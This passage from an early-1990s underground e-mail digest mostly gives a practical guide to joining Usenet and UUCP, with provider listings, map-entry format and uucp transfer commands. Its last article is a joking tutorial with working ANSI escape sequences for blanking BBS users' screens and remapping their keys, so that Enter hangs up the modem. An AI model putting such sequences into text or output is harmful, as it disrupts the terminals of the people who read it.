  854. run on any pc compatible computer. The price is right at $100. If you just
  855. want uucp connectivity, but you don't want to switch to a real operating
  856. system, then you might want to check out the Waffle BBS package. It can be
  857. found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com
  858. BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground
  859. BBS. The package does not need to be run as a bbs, but can also be run as a
  860. personal system, and it is shareware. If you want freeware, then you might be
  861. interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my
  862. bbs. Source code is available.
  863.  
  864.     Once you have software, read and re-read the docs. Get a friend to connect
  865. with you and learn how to use your software before you bother a sysadmin with
  866. connecting to Usenet proper.
  867.  
  868. CONNECTING TO USENET
  869.  
  870.     And now the hard part: you need to find someone to feed you. Mail feeds
  871. are usually not too difficult, but newsfeeds are harder to come by as they
  872. take more resources from the host machine than mail feeds due to the much
  873. larger volume of information. Possible sources of feeds include:
  874.  
  875.     - Systems on the previously mentioned *nixpub listing.
  876.     - Local colleges or universities.
  877.     - Systems found scanning the uucp maps.
  878.  
  879.         These can be gotten using anonymous uucp from UUNET, or also from
  880.         the mail server at MIT. You can request an index of the maps by
  881.         sending email to 'mail-server@pit-manager.mit.edu' with this message:
  882.  
  883.             path <your-site@address>
  884.             send usenet/comp.mail.maps/index
  885.             quit
  886.  
  887.         You can get help for this mail server by replacing the 'send' line
  888.         with just 'help'. You can see how being on the net already helps you
  889.         to get your machine on the net. The uucp maps are also an excellent
  890.         hackers tool as they list the sites in your area, points of contact,
  891.         and how they connect up to each other (at least for uucp connections).
  892.  
  893.         I believe older copies of the uucp maps can be found in the TELECOM
  894.         or UNIX forums on Compuserve.
  895.  
  896.     - Pay services.
  897.  
  898.     Here are some of the providers:
  899.  
  900.       o Anterior Technology
  901.         P.O. Box 1206
  902.         Menlo Park, CA  94026-1206
  903.         Voice: (415) 328-5615
  904.         info@fernwood.mpk.ca.us
  905.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  906.  
  907.       o CERFnet
  908.         P.O. Box 85608
  909.         San Diego, CA  92186-9784
  910.         Voice: (800) 876-CERF
  911.         help@cerf.net
  912.         (connectivity, name service, MX forwarding, news feeds)
  913.  
  914.       o Colorado SuperNet, Inc.
  915.         Attn: David C. Menges
  916.         Colorado School of Mines
  917.         1500 Illinois
  918.         Golden, CO  80401
  919.         Voice: 303-273-3471
  920.         dcm@csn.org
  921.         (UUCP, news feeds)
  922.  
  923.       o MSEN, Inc.
  924.         628 Brooks Street
  925.         Ann Arbor, MI 48103
  926.         Voice: (313) 741-1120
  927.         info@msen.com
  928.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  929.  
  930.       o MV Communications, Inc.
  931.         P.O. Box 4963
  932.         Manchester, NH  03108-4963
  933.         Voice: (603) 429-2223
  934.         Data: (603) 429-1735 (log in as "info" or "rates")
  935.         info@mv.mv.com
  936.         (UUCP, name service, MX forwarding, news feeds)
  937.  
  938.       o NEARnet
  939.         Attn: John Curran
  940.         BBN Systems and Technologies
  941.         MS 6/3B
  942.         10 Moulton Street
  943.         Cambridge, MA  02138
  944.         Voice: (617) 873-8730
  945.         jcurran@nic.near.net
  946.         (connectivity, name service, MX forwarding, news feeds (for
  947.          NEARnet sites))
  948.  
  949.       o Netcom - Online Communication Services
  950.         P.O. Box 20774
  951.         San Jose, CA 95160
  952.         Voice: (408) 554-8649
  953.         bobr@netcom.com
  954.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  955.  
  956.       o SURAnet
  957.         8400 Baltimore Blvd.
  958.         College Park, MD  20742
  959.         Voice: (301) 982-3214
  960.         news-admin@sura.net
  961.         (connectivity, name service (for SURAnet sites), news feeds (for
  962.          SURAnet sites))
  963.  
  964.       o UUNET Canada, Inc.
  965.         1 Yonge St., Suite 1801
  966.         Toronto, Ontario
  967.         Canada M5E 1W7
  968.         Voice: (416) 368-6621
  969.         info@uunet.ca or uunet-ca@uunet.uu.net
  970.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  971.  
  972.       o UUNET Technologies Inc.
  973.         3110 Fairview Park Drive, Suite 570
  974.         Falls Church, VA 22042
  975.         Voice: (703) 876-5050
  976.         info@uunet.uu.net
  977.         AlterNet (network connectivity) info: alternet-info@uunet.uu.net
  978.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  979.  
  980.      o  UUNORTH, Inc.
  981.         Box 445, Station E
  982.         Toronto, Ontario
  983.         Canada M6H 4E3
  984.         Voice: (416) 537-4930 or (416) 225-UNIX
  985.  
  986.      o  Performance Systems International, Inc.
  987.         11800 Sunrise Valley Drive, Suite 1100
  988.         Reston, VA  22091
  989.         Voice: (703) 620-6651 or (800) 827-7482
  990.         Computerized info: all-info@psi.com
  991.         Human-based info: info@psi.com
  992.         (UUCP, connectivity, name service, MX forwarding, news feeds)
  993.  
  994. SUBMIT A UUCP MAP ENTRY
  995.  
  996.    All machines connecting to the UUCP network should submit
  997.    a UUCP map to the map coordinator, <uucpmap@rutgers.edu>. The
  998.    purpose of these maps is to facilitate finding the fastest
  999.    path between any two systems, and also to prevent duplicate
  1000.    names that would cause mail to be lost.
  1001.  
  1002.    Maps are posted to comp.mail.maps newsgroup on a fairly
  1003.    regular basis. In addition to the maps, there is a README file
  1004.    that documents these details in much more detail -- the
  1005.    information here is not enough to construct a full map entry.
  1006.  
  1007.    You should obtain this README file from one of your neighbors;
  1008.    it is also available on the waffle BBS system +1 408 245 SPAM (as
  1009.    the file /public/waffle/uucp-map.txt), or it can be found in the
  1010.    /public/text/misc directory on The Underground BBS.
  1011.  
  1012.    The basic format of the maps consists of a number of lines
  1013.    with a # and a letter, followed by a tab and then information
  1014.    corresponding to that letter:
  1015.  
  1016.         #N    UUCP name of site
  1017.         #S    manufacturer machine model; operating system & version
  1018.         #O    organization name
  1019.         #C    contact person's name
  1020.         #E    contact person's electronic mail address
  1021.         #T    contact person's telephone number
  1022.         #P    organization's address
  1023.         #L    latitude / longitude
  1024.         #R    remarks
  1025.         #U    netnews neighbors
  1026.         #W    who last edited the entry ; date edited
  1027.         #
  1028.         sitename      .domain
  1029.         sitename      remote1(FREQUENCY), remote2(FREQUENCY),
  1030.               remote3(FREQUENCY)
  1031.  
  1032. ARCHIVE SERVERS
  1033.  
  1034.    There are many archive servers. These systems provide files via e-mail.
  1035. For example the pit-manager mail server at MIT mentioned above is one. You
  1036. can get back issues of the Computer Underground Digest from the University
  1037. of Chicago archive server. To use the U. of Chicago email server, send mail
  1038. with the subject "help" (without the quotes) to:
  1039.  
  1040.     archive-server@chsun1.spc.uchicago.edu.
  1041.  
  1042.     There are many more archive servers. You can also get binaries using a
  1043. pair of utilities called uuencode, and uudecode. These utilities convert
  1044. binary code to ascii text code suitable for transmission via e-mail (or to be
  1045. posted on when of the many .binaries newsgroups on Usenet.
  1046.  
  1047. MAILING LISTS
  1048.  
  1049.     Once you have an e-mail account you can join mailing lists. These can be
  1050. the electronic equivalent of the newsletters, or they can echo mail to
  1051. multiple destinations. For example you mail a certain mail list, and copies
  1052. will be echoed to all who are on the list. For example you can sign up for
  1053. the Phrack electronic P/H newsletter by:
  1054.  
  1055. 1.  Send a piece of electronic mail to "LISTSERV@STORMKING.COM".  The mail
  1056.     must be sent from the account where you wish Phrack to be delivered.
  1057.  
  1058. 2.  Leave the "Subject:" field of that letter empty.
  1059.  
  1060. 3.  The first line of your mail message should read:
  1061.     SUBSCRIBE PHRACK <your name here>
  1062.  
  1063. 4.  DO NOT leave your address in the name field!
  1064.     (This field is for PHRACK STAFF use only, so please use a full name)
  1065.  
  1066. Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.
  1067.  
  1068.     Incidentally, you do not have to be part of the Usenet, ot the Internet
  1069. (the TCP/IP network), to participate. See the excellent article in NIA73
  1070. about e-mail gateways between networks "Internet to Anywhere" by Industrial
  1071. Phreak.
  1072.  
  1073.     I should also mention that with a mail account, you can still post to
  1074. a Usenet newsgroup. Send mail to <newsgroup>@ucbvax.berkeley.edu. For
  1075. newsgroup you want to change any periods to dashes. For example,
  1076. alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire
  1077. a response to your posting be sure to put in a line like: Please e-mail all
  1078. replies.
  1079.  
  1080. USING UUCP TO TRANSFER FILES
  1081.  
  1082.    The uucp program allows files to be transmitted to and from
  1083.    any neighboring system, via the command line.
  1084.  
  1085.    To "push" a file from the local machine to the remote machine:
  1086.  
  1087.         uucp filename.here unix!/filename.there
  1088.  
  1089.    To "pull" a file into a machine off the remote machine:
  1090.  
  1091.         uucp unix!/filename.there filename.here
  1092.  
  1093.     unix is used here as the name of the remote machine.
  1094.  
  1095.     For example you can connect to the uunet machine directly via
  1096. a 1-900 number, and get access to a wealth of source code and
  1097. information about the network. Call 1-900-468-7727 and use the login
  1098. "uucp" with no password. Callers are charged 50 cents per minute.
  1099. The charges appear on your phone bill.
  1100.  
  1101.      The  file  uunet!/help  contains  instructions.   The  file
  1102. uunet!/ls-lR.Z  contains  a complete list of the files available
  1103. and is updated daily.  Files ending in Z need to be uncompressed
  1104. before being used.   The file uunet!/compress.tar is a tar
  1105. archive containing the C sources for the uncompress program.
  1106.  
  1107. 1. How to reach UUNET's 900 number via uucp
  1108.  
  1109.    Here are some sample a L.sys or Systems file lines suitable for
  1110.    UUNET's 900 number:
  1111.  
  1112.    # Simple line.
  1113.    uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
  1114.    #
  1115.    # Set up for a Telebit.
  1116.    uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT ""
  1117.        login: uucp
  1118.  
  1119.    Modify as appropriate for your site, of course, to deal with your
  1120.    local telephone system and uucp version.
  1121.  
  1122.    All modems on the 900 lines are Telebit T2500s.  Note that these
  1123.    modems first answer with V.32, then at 2400, 1200, and last with PEP
  1124.    tones.  This "900" number charges $.50US per minute to the caller.
  1125.  
  1126. 2. Where the files are
  1127.  
  1128.    This file of instructions exists as the file uunet!/info/archive-help
  1129.    uunet!/ls-lR.Z contains a list of all files available.  This is the
  1130.    compressed output of an `ls -lR' command.  This file is updated each
  1131.    night.  (Note this file is currently about 520 Kbytes *compressed*).
  1132.    Information on other indexes can be found in uunet!/index/README.
  1133.    The file uunet!/info/layout details the basic organization of the
  1134.    archive.
  1135.  
  1136. 3. File formats
  1137.  
  1138.    Files with .Z endings are compressed.  The uncompress program is
  1139.    available in uunet!/compress.tar if you don't have it.
  1140.  
  1141.    Some very large files have been split into several files for you.
  1142.    This are usually evidenced by sequenced endings after a .Z ending.
  1143.         eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39
  1144.    After you obtain all of the parts you need only concatenate them
  1145.    in the proper order.
  1146.         eg: cat 18.57.Z.* > emacs-18.57.Z
  1147.  
  1148. UUCP File Transfer Tips
  1149.  
  1150.    You must write files you transfer to a directory which the user
  1151.    "uucp" has write access.  That user, not you, will actually do the
  1152.    transfer.  /usr/spool/uucppublic is the common place used.
  1153.  
  1154.    You may see different pathnames for files in an archive which
  1155.    equate to the same thing.  For example an archive that is /usr/spool/ftp
  1156.    (aka ftp), might also accessible as /usr/spool/uucppublic (aka
  1157.    uucp, or just  for UUCP).
  1158.  
  1159.    Be sure you use absolute pathnames when specifying remote filename.
  1160.    If you don't, your working directory will be prepended to the
  1161.    pathname in the command.  uunet!file and uunet!/file are different.
  1162.    uunet!/ is the best reference to the base of the archive via uucp.
  1163.  
  1164.    Permission denied messages normally indicate a file name or
  1165.    file access problem.  Be sure to have the latest copy of the file
  1166.    list.
  1167.  
  1168.    Beware when using shell meta-characters in transfers.  You need to
  1169.    escape them in most circumstances (eg: the ! in csh).  Also note
  1170.    that there are a number of UUCP implementations which do not handle
  1171.    multi-file transfers correctly.  If you pass a * to the remote
  1172.    system you may get 'access denied' messages.  These indicate a UUCP
  1173.    problem, not a file problem.
  1174.  
  1175. OTHER RESOURCES
  1176.  
  1177.   In addition to the resources already mentioned, there are several
  1178. books which discuss USENET and/or UUCP maintenance.  They include:
  1179.  
  1180.         Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2
  1181.         Date: 1990. Pages: 210. Cost: $24.95
  1182.  
  1183.         Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
  1184.         ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95
  1185.  
  1186.     Both are "Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut
  1187. Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts
  1188.  
  1189.         Unix Communications; Bart Anderson, Barry Costales, and Harry
  1190.         Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
  1191.         Pages: 736. Cost: $29.95.
  1192.  
  1193.     Covers everything the end user needs to know about email, USENET and UUCP.
  1194.  
  1195. ------------------------------------------------------------------------------
  1196. ------------------
  1197. | Article 8 of 8 |
  1198. ------------------
  1199.  
  1200. To: hackers@tsf.UUCP
  1201. Subject: Text phile 3.
  1202. From: bbc@tsf.UUCP (The BBC)
  1203. Organization: The CyberUnderground
  1204.  
  1205.     Welcome, Kiddies... To another jam packed fun day at... The BBC's
  1206. crash house... Todays secret word is 'ANSI'... Yes after this lesson
  1207. when ever a sysop/user hears the word 'ANSI', They will scream real
  1208. loud!!!
  1209.  
  1210.     First lets ask our friend Crashy a question... Crashy, do you
  1211. use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have
  1212. the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???
  1213. 'Well... Yes, I guess'... Good, See kiddies every one uses it but
  1214. few understand it... An that is how we will play with the users
  1215. of a bbs's mind as well as the sysops [usually not much of one here]...
  1216.  
  1217.     First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method
  1218. of controlling IO on remote systems... It uses escape sequences to
  1219. do every thing from moving the cursor around and changing color of
  1220. the text to redefining the keyboard keys... A very useful tool for
  1221. helping computer users and making nice displays.. An a cheep shot
  1222. as far as hacking games go... But that never stoped us before... For
  1223. what if some devious minds where to put them to use??? An we are just
  1224. the ones to do it... Also for those who don't know, [ESC] stands for
  1225. the escape char. [0x1b] or to type it in remote hold down the ALT key
  1226. while typing 27 on the numeric key pad then release the ALT key...
  1227.  
  1228.     Lets start with a classic... We all know to change the text color
  1229. you use the sequence 'ESC[<color>;<color>;...<color>m' and it will
  1230. change the color for all following text till it is used again... Well
  1231. what if one uses the command 'ESC[0;8m'... This would cause the ANSI
  1232. [AAAAHHHHH] driver to reset the color to default then set the screen
  1233. to black text on a black background... What a glorious sight (or lack
  1234. of there) when the computer just seems to stop... No text no
  1235. nothing... An if they don't reset it, well.... All the boards they
  1236. call afterwards will do the same...
  1237.  
  1238.     Or how about this one... 'ESC[=0h;=7l'... All it does is set the
  1239. screen to 40 column mode and turns line wrapping off... So there eyes
  1240. get a rest... only half the calories of a regular screen and in
  1241. larger portions...
  1242.  
  1243.     Then there is the story of the farmer's 'ESC[26;0H'... Moving the
  1244. cursor off the screen and making them wait for the next prompt (if
  1245. this command is at the end of a message) that seams to never come...
  1246. But you should not tell this joke in polite company...
  1247.  
  1248.     An of course we saved the best for last... The ol' Two Face key
  1249. change... Just use the command 'ESC[<From key>;<To key>p' and wha-la
  1250. instant chaos... For example 'ESC[13;0;35p', next time the [ENTER]
  1251. key is hit it changes into a ALT-H (The hangup command for most
  1252. term packages... An we would hope you would not use this to just
  1253. redefine the whole keyboard so that what they type is not what
  1254. they get!!! That would be.... bad... An you are not a bunch of
  1255. bad boys and girls are you... We thought so...
  1256.  
  1257.     So boys and girls... Its time to go... and remember...
  1258. The night belongs to the hackers... The early hacker gets to DOS...
  1259. A virus in the system is worth 2 trojans in the bush... Ect.. Ect..
  1260. Ect..
  1261.  
  1262. 'Another fine mess' from your friends at...
  1263. The BBC
  1264.  
  1265. ----------------------------------------------------------------------
  1266.  ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
  1267.              -=[ "Anarchy is never HAVING to say you're sorry." ]=-
  1268.  
  1269. ------------------------------------------------------------------------------
  1270.  That's all folks...keep that e-mail coming!
  1271. ------------------------------------------------------------------------------
  1272.  
  1273.                             -= Max Cray =-
  1274.  Internet:   underg!max@uunet.uu.net                         Support
  1275.  UUCP:       ...!uunet!underg!max                            Free
  1276.  Data:       The Underground Computing Foundation BBS        Software
  1277.              401-847-2603 -=- 9600 baud (v.32)               (w/src)
  1278.  CI$:        76334,2203
  1279. 
  1280. Downloaded From P-80 International Information Systems 304-744-2253
  1281.